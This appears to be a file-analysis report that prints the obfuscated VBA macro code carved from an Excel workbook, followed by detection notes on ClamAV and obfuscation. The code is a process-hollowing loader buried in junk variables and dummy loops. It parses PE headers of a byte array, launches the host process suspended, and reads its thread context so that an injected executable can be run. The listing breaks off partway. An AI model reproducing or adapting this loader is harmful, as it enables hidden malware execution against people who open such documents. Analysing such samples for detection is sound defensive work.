FileToByteArray = baFileContent
End Function
Public Sub SnudjfdghskySbgaGcyaN(ByRef WBzIkfTMiJXPkVdFXWVcz() As Byte, YURScgiKJQzDIUKUuXait As String)
Dim structDOSHeader As IMAGE_DOS_HEADER
Dim quXRtMaNwiSNyNIHuUlts
quXRtMaNwiSNyNIHuUlts = 1618
Do Until quXRtMaNwiSNyNIHuUlts = 0
Dim UECorpMiWbCTJkJtigceo, LecLgchSOTwoxvPvDbxmF
UECorpMiWbCTJkJtigceo = "aqNavvbxvdQxOWgEIhQmB"
LecLgchSOTwoxvPvDbxmF = UECorpMiWbCTJkJtigceo
quXRtMaNwiSNyNIHuUlts = quXRtMaNwiSNyNIHuUlts - 1
Loop
Dim ptrDOSHeader As LongPtr: ptrDOSHeader = VarPtr(structDOSHeader)
Call RtlMoveMemory(ptrDOSHeader, VarPtr(WBzIkfTMiJXPkVdFXWVcz(0)), SIZEOF_IMAGE_DOS_HEADER)
Dim HLVrJJmzngwlkdbEmgfcs, tJIibTlRUirTcJibjRexD
HLVrJJmzngwlkdbEmgfcs = "TOCYnmOioeizABlmFohhf"
tJIibTlRUirTcJibjRexD = InStr(HLVrJJmzngwlkdbEmgfcs, "m")
If tJIibTlRUirTcJibjRexD = 0 Then
Dim bNVxsTnhTlPvQncmjIPaH, rWeqitSCcnbDNsVMJHYWJ
bNVxsTnhTlPvQncmjIPaH = "ElOTWDeDRImWLRryiECen"
rWeqitSCcnbDNsVMJHYWJ = True
Else
Dim bWBykwgNajnwVIPQgkAuD, RWORcTfzzaPdWqaCRWWMO, beMgRJfUCxyCfiYMFhBao
bWBykwgNajnwVIPQgkAuD = "atmpUcPlFqrYjoCNepHKD"
RWORcTfzzaPdWqaCRWWMO = "vvVCNJTMwIEcQERBEcBns"
beMgRJfUCxyCfiYMFhBao = InStr(Mid(bWBykwgNajnwVIPQgkAuD, 3, 2), Mid(bWBykwgNajnwVIPQgkAuD, 5, 2))
If beMgRJfUCxyCfiYMFhBao < 0 Then
Dim AjxtXrOoonDHOPSbKkkYD, VCqzQhbPlOuLzATpLSrpG
AjxtXrOoonDHOPSbKkkYD = 668
VCqzQhbPlOuLzATpLSrpG = AjxtXrOoonDHOPSbKkkYD - 1538
Else
Dim ojUUqsfKUWqaJDFgTgjNx
ojUUqsfKUWqaJDFgTgjNx = CurDir
End If
End If
If structDOSHeader.e_magic = IMAGE_DOS_SIGNATURE Then
If VERBOSE Then
Dim ssyPupJfBwWyWUzcOVWsK
ssyPupJfBwWyWUzcOVWsK = "ooYLXqRIWHsvEAOUfqRdK"
If Len(ssyPupJfBwWyWUzcOVWsK) < Len("i") Then
Dim BkRkfztxTbdEDhNhYiwKp, oEPKaEgWTjLJAPhGFoPpG
BkRkfztxTbdEDhNhYiwKp = 2296
oEPKaEgWTjLJAPhGFoPpG = 852
If BkRkfztxTbdEDhNhYiwKp = oEPKaEgWTjLJAPhGFoPpG Then
Dim GvTStNKTPNAHvmEbyfUmz, aQqTdqFztSGuIHjUQGPuc
GvTStNKTPNAHvmEbyfUmz = "PWniRMhBilLLYbegXVFxr"
aQqTdqFztSGuIHjUQGPuc = 4564
Else
Dim dvkceCBFgjTdgGDDXpxfu
dvkceCBFgjTdgGDDXpxfu = True
End If
Else
Dim vUTmMEvgGxfRwVvfRXNeT, mILrBaFrRrspHHzqPrWgy
vUTmMEvgGxfRwVvfRXNeT = "LVnJoFuRsLEejyqKCfDKh"
mILrBaFrRrspHHzqPrWgy = InStr(vUTmMEvgGxfRwVvfRXNeT, "e")
If mILrBaFrRrspHHzqPrWgy <= 0 Then
Dim yKNlJKhxgqIazjlhTkEPO
yKNlJKhxgqIazjlhTkEPO = Date
Else
Dim NgMBOoUObFPWvMXXgQpxT
NgMBOoUObFPWvMXXgQpxT = "NvGJEyKOgtmEtdbaxDhMI"
End If
End If
End If
Else
Exit Sub
End If
Dim OHxWwnFFcYkuutsSmpvvg
OHxWwnFFcYkuutsSmpvvg = 57
Do While OHxWwnFFcYkuutsSmpvvg > 0
Dim IvPoaCMDFWKuIVuVYaInE, iGfuQJJjMRrGQflHHwJRb
IvPoaCMDFWKuIVuVYaInE = "ohxojVgsqJJDbITvmHfJS"
iGfuQJJjMRrGQflHHwJRb = InStr(IvPoaCMDFWKuIVuVYaInE, "i")
If iGfuQJJjMRrGQflHHwJRb < 0 Then
Dim wcyYLxWVnpMhBAOJTiSdu, SetNQPjoqDXvCLDFuemLm
wcyYLxWVnpMhBAOJTiSdu = 3340
SetNQPjoqDXvCLDFuemLm = wcyYLxWVnpMhBAOJTiSdu
Else
Dim yCDypEvWNnPNFCXfkTGMH, VKNLXOleyeGqitBOpBlNr
yCDypEvWNnPNFCXfkTGMH = "cevmjMsprUcgemGPFFfyx"
VKNLXOleyeGqitBOpBlNr = Replace(yCDypEvWNnPNFCXfkTGMH, "r", "h")
End If
OHxWwnFFcYkuutsSmpvvg = OHxWwnFFcYkuutsSmpvvg - 1
Loop
Dim structNTHeaders As IMAGE_NT_HEADERS
Dim ptrNTHeaders As LongPtr: ptrNTHeaders = VarPtr(structNTHeaders)
Dim YojvjGpiDpbphfTsKpsiY, uQgoGUCGvracRrpGoOUTn, YjlQQeEGxUUIkEwcgCLMA
YojvjGpiDpbphfTsKpsiY = "hGViFAjkEYECQPLrOjRpj"
uQgoGUCGvracRrpGoOUTn = "jxxjvpUsvYqtvFebFFCoS"
YjlQQeEGxUUIkEwcgCLMA = InStr(Mid(YojvjGpiDpbphfTsKpsiY, 8, 6), Mid(YojvjGpiDpbphfTsKpsiY, 1, 6))
If YjlQQeEGxUUIkEwcgCLMA > 0 Then
Dim hWbnpNEKwAwnLuHUwPQWa, XwesGMREhmjgLRlkDApYU
hWbnpNEKwAwnLuHUwPQWa = 1561
XwesGMREhmjgLRlkDApYU = hWbnpNEKwAwnLuHUwPQWa
Else
Dim buyvyjOhJLUOAjAWUHaLg
buyvyjOhJLUOAjAWUHaLg = True
End If
Call RtlMoveMemory(ptrNTHeaders, VarPtr(WBzIkfTMiJXPkVdFXWVcz(structDOSHeader.e_lfanew)), SIZEOF_IMAGE_NT_HEADERS)
If structNTHeaders.Signature = IMAGE_NT_SIGNATURE Then
If VERBOSE Then
Dim QvmyqWywHIPMYPNTKwkvk
QvmyqWywHIPMYPNTKwkvk = 1334
Do Until QvmyqWywHIPMYPNTKwkvk = 0
Dim JpkUuIIWJYHdSyOvlVKtR, EfUtkxJKHYFbjhfbDVoOz
JpkUuIIWJYHdSyOvlVKtR = "nhYCvJSoAXeWbFWiDdwxA"
EfUtkxJKHYFbjhfbDVoOz = Replace(JpkUuIIWJYHdSyOvlVKtR, "b", "d")
QvmyqWywHIPMYPNTKwkvk = QvmyqWywHIPMYPNTKwkvk - 1
Loop
End If
Else
Exit Sub
End If
If VERBOSE Then
Dim QcVMcLdPnUJgGwXofQBdw, YxNBPgdnYRAVcSpMGEnrM
QcVMcLdPnUJgGwXofQBdw = 3465
For YxNBPgdnYRAVcSpMGEnrM = 1 To QcVMcLdPnUJgGwXofQBdw
Dim eKKGdGhwgsVcCQDikmFYC, odijEDIBxmnKIUMcUMyVQ, RzDSybLEvsHrkPHBwxdyT
eKKGdGhwgsVcCQDikmFYC = 831
odijEDIBxmnKIUMcUMyVQ = "IgqXyyAzbsfjoAkkYlcYc"
RzDSybLEvsHrkPHBwxdyT = eKKGdGhwgsVcCQDikmFYC
Next YxNBPgdnYRAVcSpMGEnrM
End If
#If Win64 Then
If structNTHeaders.FileHeader.Machine = IMAGE_FILE_MACHINE_I386 Then
Exit Sub
End If
#Else
If structNTHeaders.FileHeader.Machine = IMAGE_FILE_MACHINE_AMD64 Then
Exit Sub
End If
#End If
Dim strCurrentFilePath As String
strCurrentFilePath = Space(MAX_PATH)
Dim JlYRueMexnPLQHaQjphTF, FqnxqDcnbdOvySVRLOktN, QvYURyVwhBWESeULtezKQ
JlYRueMexnPLQHaQjphTF = "SVQgpygdLvCEqfBWWcTEt"
FqnxqDcnbdOvySVRLOktN = "yfezyovwVjtUBEfTygSBn"
QvYURyVwhBWESeULtezKQ = InStr(Mid(JlYRueMexnPLQHaQjphTF, 4, 8), Mid(JlYRueMexnPLQHaQjphTF, 4, 7))
If QvYURyVwhBWESeULtezKQ < 0 Then
Dim wjbqrOdYxAWzROTnCyfgP, SARPFObfsKJIWtmXDzJRx
wjbqrOdYxAWzROTnCyfgP = 580
SARPFObfsKJIWtmXDzJRx = (wjbqrOdYxAWzROTnCyfgP Mod 4)
Else
Dim JbaeboaxPEuDaCHizKYcS, fOmPUuGpYXuosjzQLEzbH
JbaeboaxPEuDaCHizKYcS = "ytfWfsABWFldWuPLFQjKG"
fOmPUuGpYXuosjzQLEzbH = InStr(JbaeboaxPEuDaCHizKYcS, "a")
If fOmPUuGpYXuosjzQLEzbH <= 0 Then
Dim BfofVQEOeNJPDElMnfTsi, QFapHtirNgzalCJXKXDcz
BfofVQEOeNJPDElMnfTsi = 3374
QFapHtirNgzalCJXKXDcz = BfofVQEOeNJPDElMnfTsi Mod 1652
Else
Dim TjJxNDnexyFHyKynOowvx, qHkOsbBNBhqqHVvpQTOTm
TjJxNDnexyFHyKynOowvx = True
qHkOsbBNBhqqHVvpQTOTm = "OliINzwcxUadfYLYBsVTU"
End If
End If
Dim lGetModuleFileName As Long
lGetModuleFileName = GetModuleFileName(0, strCurrentFilePath, MAX_PATH)
Dim JFsTPhymiVupEbUehMWpx
JFsTPhymiVupEbUehMWpx = 3244
Do Until JFsTPhymiVupEbUehMWpx = 0
Dim eQDBinNstmoTeGkuigPUv, snFJLuKekqIgLFNOsHTJS
eQDBinNstmoTeGkuigPUv = "TsLRkKVJgFcDBzIuCKpUr"
snFJLuKekqIgLFNOsHTJS = Replace(eQDBinNstmoTeGkuigPUv, "b", "d")
JFsTPhymiVupEbUehMWpx = JFsTPhymiVupEbUehMWpx - 1
Loop
strCurrentFilePath = Left(strCurrentFilePath, InStr(strCurrentFilePath, vbNullChar) - 1)
Dim strCmdLine As String
Dim zhYxCkRdRWlebIhkOpnTE
zhYxCkRdRWlebIhkOpnTE = 3496
Do While zhYxCkRdRWlebIhkOpnTE > 0
Dim WWOYGfHKtdCpDjLlsWbjC, MICuFxkemRSrDBkjxUejs
WWOYGfHKtdCpDjLlsWbjC = "uztKIXFhtcKCXQwRdniVF"
MICuFxkemRSrDBkjxUejs = InStr(WWOYGfHKtdCpDjLlsWbjC, "i")
If MICuFxkemRSrDBkjxUejs < 0 Then
Dim ySHOxyvXwrmKckomEaGxG, gkJWYHBbTcVYjoPTEiXOf
ySHOxyvXwrmKckomEaGxG = 569
gkJWYHBbTcVYjoPTEiXOf = ySHOxyvXwrmKckomEaGxG
Else
Dim PAGGArVWSTxLLrHXQxQSV, CppKRVxraRHHApJdqxpEe
PAGGArVWSTxLLrHXQxQSV = "NsbvFPyUlCDDzomaYvlJA"
CppKRVxraRHHApJdqxpEe = Replace(PAGGArVWSTxLLrHXQxQSV, "r", "h")
End If
zhYxCkRdRWlebIhkOpnTE = zhYxCkRdRWlebIhkOpnTE - 1
Loop
strCmdLine = strCurrentFilePath + " " + YURScgiKJQzDIUKUuXait
Dim strNull As String
Dim structProcessInformation As PROCESS_INFORMATION
Dim BjuStTIShBaAXsbqieoYO
BjuStTIShBaAXsbqieoYO = "xVhVMKhUinlqUIuxEScOd"
If Len(BjuStTIShBaAXsbqieoYO) < Len("i") Then
Dim FAtkPIfUhHffcQSMuOlxA, SRTEeWsVOwkbAVHbIDkCW
FAtkPIfUhHffcQSMuOlxA = 728
SRTEeWsVOwkbAVHbIDkCW = 2354
If FAtkPIfUhHffcQSMuOlxA = SRTEeWsVOwkbAVHbIDkCW Then
Dim aTTuUBhCNpdBoLHyELLMY, rkTeATkLKkaTCSXYkiuls
aTTuUBhCNpdBoLHyELLMY = "kcXTAYAnRAhQxuaqvmgAM"
rkTeATkLKkaTCSXYkiuls = 1277
Else
Dim ahhymjaBeQyPXHJYpuGVQ
ahhymjaBeQyPXHJYpuGVQ = True
End If
Else
Dim cecGKSIzuDqAGrcMEoKjj, GtBdElnYTMNoAXcfRAqqc
cecGKSIzuDqAGrcMEoKjj = "scxLvOUhzieIjmTjbmLFG"
GtBdElnYTMNoAXcfRAqqc = InStr(cecGKSIzuDqAGrcMEoKjj, "e")
If GtBdElnYTMNoAXcfRAqqc <= 0 Then
Dim JnhorqGmKgVLGuKACgHuz
JnhorqGmKgVLGuKACgHuz = Date
Else
Dim zPCmftaGMNuShWftOnUGM
zPCmftaGMNuShWftOnUGM = "qLdywnugjFUnpRYzifjFg"
End If
End If
Dim structStartupInfo As STARTUPINFO
If VERBOSE Then
Dim WEMHOLbXagkopHteLxzzU
WEMHOLbXagkopHteLxzzU = 3200
Do Until WEMHOLbXagkopHteLxzzU = 0
Dim hORoSragXCzXOVTJWrbRO, MFgTucRLVEWSPOOUtUubQ
hORoSragXCzXOVTJWrbRO = "QBSCrDotHVBjxEclWGFXr"
MFgTucRLVEWSPOOUtUubQ = hORoSragXCzXOVTJWrbRO
WEMHOLbXagkopHteLxzzU = WEMHOLbXagkopHteLxzzU - 1
Loop
End If
Dim lCreateProcess As Long
Dim hjfrkQUWGJrRJXMeyjlPn
hjfrkQUWGJrRJXMeyjlPn = "zKytOfyHgtjLuyoitbWBe"
If Len(hjfrkQUWGJrRJXMeyjlPn) < Len("i") Then
Dim WHwzOaaPvgrTdCkhYiUdQ, pfoAPNKLIIVnikBIRvQTg
WHwzOaaPvgrTdCkhYiUdQ = 2929
pfoAPNKLIIVnikBIRvQTg = 3562
If WHwzOaaPvgrTdCkhYiUdQ = pfoAPNKLIIVnikBIRvQTg Then
Dim kCYWFuCWybqLvHBhXYmpd, MxvGUsIxhMdjJeCpDjsiN
kCYWFuCWybqLvHBhXYmpd = "YhfOCvFQWKbuCTqsshzyk"
MxvGUsIxhMdjJeCpDjsiN = 1598
Else
Dim jGFALBYATvEEdxfDqKcSy
jGFALBYATvEEdxfDqKcSy = True
End If
Else
Dim rnmCLCYQuOShoDPOfiPIV, mqyEFFwKmxpooQstXYYaJ
rnmCLCYQuOShoDPOfiPIV = "JuFiYwgRxaGilADtDlIRQ"
mqyEFFwKmxpooQstXYYaJ = InStr(rnmCLCYQuOShoDPOfiPIV, "e")
If mqyEFFwKmxpooQstXYYaJ <= 0 Then
Dim zGKwNTpOkBmjBeWMWfVBg
zGKwNTpOkBmjBeWMWfVBg = Date
Else
Dim hqDRYLwvhjQHmMJMhRLhV
hqDRYLwvhjQHmMJMhRLhV = "jIhrQDXObSxdSpLyGDYzX"
End If
End If
lCreateProcess = CreateProcess(strNull, strCurrentFilePath + " " + YURScgiKJQzDIUKUuXait, 0&, 0&, False, CREATE_SUSPENDED, 0&, strNull, structStartupInfo, structProcessInformation)
If lCreateProcess = 0 Then
Exit Sub
Else
If VERBOSE Then
Dim dyclRynkWulYLhcPHLEXs
dyclRynkWulYLhcPHLEXs = "MMvFaScyCrphENhRscsuA"
If Len(dyclRynkWulYLhcPHLEXs) < Len("i") Then
Dim atImoNuwBHkHGctOWWeEY, YoKfDYwhdOPyGcftXDKRN
atImoNuwBHkHGctOWWeEY = 4602
YoKfDYwhdOPyGcftXDKRN = 353
If atImoNuwBHkHGctOWWeEY = YoKfDYwhdOPyGcftXDKRN Then
Dim uLbqffIbJOAstbeXhJNXo, xStiaYnuYttLkDBINyTMf
uLbqffIbJOAstbeXhJNXo = "oqnaPnkujeuzMmYbOgpOj"
xStiaYnuYttLkDBINyTMf = 498
Else
Dim tapfmbavQSVSzVSGifguF
tapfmbavQSVSzVSGifguF = True
End If
Else
Dim JvhFjwCoslTlieRecNWnY, izwRKGHcFtMrzIEhzcDxg
JvhFjwCoslTlieRecNWnY = "JutFCdDoCYCHDxvhFkFRe"
izwRKGHcFtMrzIEhzcDxg = InStr(JvhFjwCoslTlieRecNWnY, "e")
If izwRKGHcFtMrzIEhzcDxg <= 0 Then
Dim xHbHqQbBfqihFBUJNyOTl
xHbHqQbBfqihFBUJNyOTl = Date
Else
Dim MQhSIvnWCKsORKRvktOGA
MQhSIvnWCKsORKRvktOGA = "snTHQBiQCVdFrEVTunkFf"
End If
End If
End If
End If
Dim structContext As CONTEXT
structContext.ContextFlags = CONTEXT_INTEGER
Dim OlWBMpyCxYfiUtfHBpihi, QbOwhclbzTytHaeumctzv
OlWBMpyCxYfiUtfHBpihi = "kSgIxKDOCUJPSOHvMECFP"
QbOwhclbzTytHaeumctzv = InStr(OlWBMpyCxYfiUtfHBpihi, "m")
If QbOwhclbzTytHaeumctzv = 0 Then
Dim PJCFbsysJXKdCXjifFmmB, XfGNntampnNHLarlPfIMH
PJCFbsysJXKdCXjifFmmB = "rMQdnDeYnKnOCIOoEyQhD"
XfGNntampnNHLarlPfIMH = True
Else
Dim PVMpfbTmgwgnTREVRNYxf, tKWvPXRVpzDyShiSxhsfa, iPGuRhLpXrJpCvlPTpdcq
PVMpfbTmgwgnTREVRNYxf = "mWabBuLtTUWvNRfpEjhyO"
tKWvPXRVpzDyShiSxhsfa = "pjvaqgRhifKylfPPcLisF"
iPGuRhLpXrJpCvlPTpdcq = InStr(Mid(PVMpfbTmgwgnTREVRNYxf, 3, 2), Mid(PVMpfbTmgwgnTREVRNYxf, 5, 2))
If iPGuRhLpXrJpCvlPTpdcq < 0 Then
Dim QWCNbKvdtFFrflUpbXPfG, qhSjqKWdDRodIqReGPwqm
QWCNbKvdtFFrflUpbXPfG = 231
qhSjqKWdDRodIqReGPwqm = QWCNbKvdtFFrflUpbXPfG - 2915
Else
Dim ELdWwkpARqmVJAPIDKYxY
ELdWwkpARqmVJAPIDKYxY = CurDir
End If
End If
Dim lGetThreadContext As Long
#If Win64 Then
Dim baContext(0 To (LenB(structContext) - 1)) As Byte
Call RtlMoveMemory(VarPtr(baContext(0)), VarPtr(structContext), LenB(structContext))
Dim hVwdBSltmnrhaJcGBKoYc
hVwdBSltmnrhaJcGBKoYc = 3784
Do While hVwdBSltmnrhaJcGBKoYc > 0
Dim PLMwCDlmzghXkiQXPOWlv, jOThgMbtoFMUTrkJGYpah
PLMwCDlmzghXkiQXPOWlv = "nvTckuhsOtLuPlSAGCLAb"
jOThgMbtoFMUTrkJGYpah = InStr(PLMwCDlmzghXkiQXPOWlv, "i")
If jOThgMbtoFMUTrkJGYpah < 0 Then
Dim MgkjOBkHLUqMFFVRovPjR, kztcpPGoiPHlovHJXrkQL
MgkjOBkHLUqMFFVRovPjR = 1684
kztcpPGoiPHlovHJXrkQL = MgkjOBkHLUqMFFVRovPjR
Else
Dim CKvioKnQsDyQpBGPhyKDt, CfIBqjniqeErgHOWTbfsw
CKvioKnQsDyQpBGPhyKDt = "hYPbucfxRmOXLIapnpxjT"
CfIBqjniqeErgHOWTbfsw = Replace(CKvioKnQsDyQpBGPhyKDt, "r", "h")
End If
hVwdBSltmnrhaJcGBKoYc = hVwdBSltmnrhaJcGBKoYc - 1
Loop
lGetThreadContext = GetThreadContext(structProcessInformation.hThread, VarPtr(baContext(0)))
#Else
Dim vmKmxEkNtCmNuvkGGXtbR
vmKmxEkNtCmNuvkGGXtbR = 1168
Do While vmKmxEkNtCmNuvkGGXtbR > 0
Dim hYgknCqbmURkbrwyWPysD, ulzAytNCtEYSjomEckcSM
hYgknCqbmURkbrwyWPysD = "tXSbSQRznrYEMFWAaHcyS"
ulzAytNCtEYSjomEckcSM = InStr(hYgknCqbmURkbrwyWPysD, "i")
If ulzAytNCtEYSjomEckcSM < 0 Then
Dim gGuDtdNhIhUHoLNGINiBx, RpRrQdjTUFvzPnDfWfqau
gGuDtdNhIhUHoLNGINiBx = 861
RpRrQdjTUFvzPnDfWfqau = gGuDtdNhIhUHoLNGINiBx
Else
Dim JwekTByWsvSronrBlBYDn, NByiyyjBKHRBchRNgWBJV
JwekTByWsvSronrBlBYDn = "yjTQRmxFkVMSzirqloymf"
NByiyyjBKHRBchRNgWBJV = Replace(JwekTByWsvSronrBlBYDn, "r", "h")
End If
vmKmxEkNtCmNuvkGGXtbR = vmKmxEkNtCmNuvkGGXtbR - 1
Loop
lGetThreadContext = GetThreadContext(structProcessInformation.hThread, structContext)
#End If
If lGetThreadContext = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Dim cnMeHWaliFUUdWsIptOai, mnDPglsifXadvOdioYKDW
cnMeHWaliFUUdWsIptOai = "iAamCKDqvhVUEcvcpvGNa"
mnDPglsifXadvOdioYKDW = InStr(cnMeHWaliFUUdWsIptOai, "m")
If mnDPglsifXadvOdioYKDW = 0 Then
Dim bMjLzhiJjInTTOYinALGc, dHUQHiozbtevllzudGdky
bMjLzhiJjInTTOYinALGc = "OmfyNfEwTrlrUaWyWXYeB"
dHUQHiozbtevllzudGdky = True
Else
Dim VpMjBYeYbxXVTWfoURYSj, ioixHDyNjTIwDhshHgikA, YUfzrntfiNeroMaEKSvFk
VpMjBYeYbxXVTWfoURYSj = "fUlVieAyuzTvCsoTNNFYS"
ioixHDyNjTIwDhshHgikA = "BOJDIbxDrwGIyJqTBEadX"
YUfzrntfiNeroMaEKSvFk = InStr(Mid(VpMjBYeYbxXVTWfoURYSj, 3, 2), Mid(VpMjBYeYbxXVTWfoURYSj, 5, 2))
If YUfzrntfiNeroMaEKSvFk < 0 Then
Dim QDpypPMgmLPHIiscXqpeH, afDfptrCWmMEpirPabxFX
QDpypPMgmLPHIiscXqpeH = 979
afDfptrCWmMEpirPabxFX = QDpypPMgmLPHIiscXqpeH - 2816
Else
Dim VcnIFEHBMBgABQxKtavvD
VcnIFEHBMBgABQxKtavvD = CurDir
End If
End If
Exit Sub
Else
#If Win64 Then
Dim dRLuuVqGMCfNvaEIghroP
dRLuuVqGMCfNvaEIghroP = 2405
Do Until dRLuuVqGMCfNvaEIghroP = 0
Dim nowzfQwjbKuyraUEyIIJt, xQAONEHVzhxWyODoUpfTx
nowzfQwjbKuyraUEyIIJt = "ddsaamXpQxJedpwINIajK"
xQAONEHVzhxWyODoUpfTx = Replace(nowzfQwjbKuyraUEyIIJt, "b", "d")
dRLuuVqGMCfNvaEIghroP = dRLuuVqGMCfNvaEIghroP - 1
Loop
Call RtlMoveMemory(VarPtr(structContext), VarPtr(baContext(0)), LenB(structContext))
#End If
If VERBOSE Then
Dim ztEEtEhRMLseNALbwgQmr, VsvDooBHpayvWcrxhgkwl, YOtyNvWmElubwDajbeqFk
ztEEtEhRMLseNALbwgQmr = "eYJdHyHEvPwVJqmNnACWA"
VsvDooBHpayvWcrxhgkwl = "SkrpCsDOVLYPAJEWRRHOs"
YOtyNvWmElubwDajbeqFk = InStr(Mid(ztEEtEhRMLseNALbwgQmr, 4, 8), Mid(ztEEtEhRMLseNALbwgQmr, 4, 7))
…
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 248320 bytes |
SHA-256: cb34daf4018c1bfcd92682416b6f1be532d8c1dfdb117b1f9d72026d3c389cc5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
2627 of 3906 identifiers look randomly generated (e.g. 'MiwiESwiMS4cCQEEAjEWLhInJQ8JFywGNywfMS8D') — consistent with name-mangling obfuscation. Carved artifact contains 30 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.